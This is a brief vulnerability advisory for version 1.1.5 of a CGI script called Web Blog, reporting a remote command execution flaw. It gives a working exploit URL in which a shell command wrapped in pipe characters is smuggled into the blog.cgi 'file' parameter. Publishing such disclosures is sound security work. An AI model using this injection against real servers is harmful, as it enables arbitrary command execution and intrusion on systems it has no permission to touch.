Product: Web Blog 1.1 Remote Execute Commands Bug Affected Versions: 1.1.5 Bug: Command Remote Execution Credits: n3rd - Lit Security Solutions (LiSS) #Affix in irc.brasnet.org Vendor: http://leifwright.com Exploiting:http://address/directory/blog.cgi?submit=ViewFile&month=[month]&year=[year]&file=|command|